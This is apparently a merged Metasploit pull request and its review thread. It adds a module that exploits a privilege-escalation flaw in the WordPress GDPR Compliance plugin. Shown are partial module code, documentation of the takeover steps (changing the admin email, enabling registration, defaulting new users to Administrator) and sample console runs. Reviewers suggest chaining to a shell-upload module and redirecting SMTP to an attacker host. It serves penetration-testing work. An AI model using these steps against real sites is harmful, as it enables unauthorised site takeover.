### PR TITLE
WP GDPR Compliance plugin exploit - privsec to admin registering

### PR DESCRIPTION
**Pull request by thomas-lab**
Adds an exploit module for one of the many vulnerabilities found in the Wordpress GDPR plugin.

## Verification

Install a Wordpress and the GDPR Compliance plugin <= [1.4.2](https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip) 

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/http/wp_gdpr_compliance_privesc`
- [x] Set RHOST, RPORT, EMAIL
- [x] `run`
- [x] **Verify** user was register

## Scenario
```
[*] Getting security token from host...
[*] Changing admin e-mail address to KkAQx@jiOQe.com...
[*] Enabling user registrations...
[*] Setting the default user role...
[+] Privilege escalation complete
[+] Create a new account at [url]/wp-login.php/?action=register to gain admin access.
[*] Auxiliary module execution completed
```

### CODE REVIEW

**Comment by h00die** [comment]
Please add module documentation

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 1]
```diff
@@ -0,0 +1,40 @@
+## Description
+
+  This module exploits the Wordpress GDPR compliance plugin lack of validation (WPVDB 9144), which affects versions 1.4.2 and lower.
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]:
```
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
```

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 2]
```diff
@@ -0,0 +1,40 @@
...
+
+  When a user triggers GDPR-related actions, Wordpress's admin-ajax.php is called but fails to do validation and capacity checks regarding the asked actions.
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]: wrap admin-ajax.php in ticks (`)

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 3]
```diff
@@ -0,0 +1,40 @@
...
+  This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server. 
+
+  This module changes the admin email to prevent notification sending, enables new user registration and changes the default role of new users to Administrator. The attacker is then able to simply create a new privileged user, then log in and take any actions on the newly compromised site.
+
+## Vulnerable Application
+
+  Any Wordpress installation with the GDPR Compliance plugin <= 1.4.2.
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]: ```[GDPR Compliance plugin <= 1.4.2](https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip).```
Make this a link, and you can remove the next line

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 4]
```diff
@@ -0,0 +1,40 @@
...
+
+  You can download the vulnerable application here: https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip
+
+## Verification Steps
+
+  Example steps in this format:
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]: remove line

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 5]
```diff
@@ -0,0 +1,40 @@
...
+  1. Do: `use auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation`
+  1. Do: `set RHOST [wp host]`
+  1. Do: `set RPORT [wp port]`
+  1. Do: `run`
+  1. Go to the Wordpress registering page, register as an administrator, profit.
+
+## Scenarios
+
+
+Example run against WordPress GDPR Compliance plugin 1.4.2:
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]: wordpress version and OS version? good for consistency.  Remove `Example run against` and add 3 # to it as well

File: documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md [hunk 6]
```diff
@@ -0,0 +1,40 @@
...
+```
+[*] Getting security token from host...
+[*] Changing admin e-mail address to random@email.com...
+[*] Enabling user registrations...
+[*] Setting the default user role...
+[+] Privilege escalation complete
+[+] Create a new account at [url]/wp-login.php/?action=register to gain admin access.
+[*] Auxiliary module execution completed
+```
```
Comment (h00die) [inline documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.md]: If this module isn't converted to an exploit, I'd like to see a scenario added where you show getting a shell.
For example:
show using this module like you have
next just write in how you made a new user with creds a/b
next show using `exploits/unix/webapp/wp_admin_shell_upload` to pop the shell.

File: modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb [hunk 7]
```diff
@@ -0,0 +1,94 @@
...
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP GDPR Compliance Plugin Privilege Escalation',
+      'Description'     => %q{
+        The Wordpress plugin GDPR Compliance allows unauthenticated users to execute any
+        action and update any database value.
+        This comes from a lack of validation in the plugin handles in WordPress’s admin-ajax.php
+        functionality, which leads to unauthorized users being abler to trigger these handlers and
+        from a failure to do capability checks when executing its internal action 'save_setting to
+        make configuration changes.
```
Comment (h00die) [inline modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb]: This should be cut a little shorter, and add in what it actually does.
Something like (spitballin here)
```
        The Wordpress plugin GDPR Compliance allows unauthenticated users to execute any
        action due to a lack of validation against WordPress's admin-ajax.php allowing 
        arbitrary users the ability to make configuration changes.
       This module changes the admin's email address, enables user registration, then
       sets the default user registration level to administrator.
```

File: modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb [hunk 8]
```diff
@@ -0,0 +1,94 @@
...
+        [
+          'Mikey Veenstra (WordFence)', # Vulnerability discovery
+          'Thomas Labadie' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['URL', 'https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/'],
+          ['WPVDB', '9144']
+        ],
```
Comment (h00die) [inline modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb]: ['CVE', '2018-19207']

File: modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb [hunk 9]
```diff
@@ -0,0 +1,94 @@
...
+      'DisclosureDate'  => 'Nov 08 2018'
+      ))
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-gdpr-compliance', '1.4.2')
```
Comment (h00die) [inline modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb]: no user feedback from the check?

File: modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb [hunk 10]
```diff
@@ -0,0 +1,94 @@
...
+      'uri'       => target_uri.path
+    )
+
+    unless wp_home_res && wp_home_res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unable to access Wordpress: #{target_uri.path}")
+    end
+
+    ajax_security = wp_home_res.body[/"ajaxSecurity":"([a-zA-Z0-9]+)"/i, 1]
+
+    new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
```
Comment (h00die) [inline modules/auxiliary/admin/http/wp_gdpr_compliance_privilege_escalation.rb]: I'd like to see this set to a non-required option.  If its not set (empty), use random like this, however during a pentest, i'd want to control where it goes to (like my email).  A customer wouldn't be happy if it was set to random address that actually happens to exist, and emails are going into the wild.  Also there are lots of 'unprofessional' words that are 5 letters that may get randomly set, which would look bad to a customer.

**Review by h00die — DISMISSED** [review]

**Comment by jrobles-r7** [comment]
When a user registers they don't provide a password so I guess that would be emailed to the user. I don't think this can be turned into an exploit module because of the registration process.

**Comment by jrobles-r7** [comment]
Maybe there is a way to set the password while registering but I haven't seen it yet.

**Comment by h00die** [comment]
Ah, year that would be a blocker then!

**Comment by h00die** [comment]
So I've been thinking about this for the ueb module, what about a print_good suggesting to run the exploit module that deploys the plug-in? Could be a vprint_good and even give the output in copy paste format

**Comment by jrobles-r7** [comment]
The [zpanel_information_disclosure_rce module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb#L258) prints a suggestion. I could add a suggestion for `exploits/unix/webapp/wp_admin_shell_upload` in this module.

**Comment by thomas-lab** [comment]
Sorry for leaving this PR open, I've been quite busy recently!
Other vulnerabilities in the GDPR plugin might be used to create an `exploit` module, but this definitely looked more like an `aux` module. 

And many thanks to @jrobles-r7 for all the hard work 😄

**Comment by jrobles-r7** [comment]
The SMTP configuration settings may be changed as well so the email is directly sent to the attacker host, however I would want to avoid overwriting additional configuration options since we aren't able to read the original value before the overwrite. I haven't tested this method but it may work since the SMTP options are saved within the same table of the database as the options that we are currently overwriting in the module.

| SMTP Options |
| --------------- |
| mailserver_login |
| mailserver_pass |
| mailserver_port |
| mailserver_url |

**Comment by jrobles-r7** [comment]
```
msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145
rhosts => 172.22.222.145
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email blahhhh@example.com
email => blahhhh@example.com
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set user blahhh
user => blahhh
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set wpemail blahh@example.com
wpemail => blahh@example.com
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit

[*] Getting security token from host...
[!] Changing admin e-mail address to blahh@example.com...
[!] Enabling user registrations...
[!] Setting the default user role type to administrator...
[*] Registering blahhh with email blahhhh@example.com
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) >
```

**Comment by jrobles-r7** [comment]
The `auxiliary/admin/http/wp_gdpr_compliance_privesc` module generates requests to overwrite Wordpress administration options on Wordpress installations with WP GDPR Compliance plugin <= v1.4.2. The requests will set the Wordpress server to allow user registration, set the default user role to Administrator, and then register a user.

**Comment by jrobles-r7** [comment]
## Release Notes

The `auxiliary/admin/http/wp_gdpr_compliance_privesc` module generates requests to overwrite Wordpress administration options on Wordpress installations with WP GDPR Compliance plugin <= v1.4.2. The requests will set the Wordpress server to allow user registration, set the default user role to Administrator, and then register a user.

**Comment by jrobles-r7** [comment]
Thanks for the contribution @thomas-lab

**Pull request merged**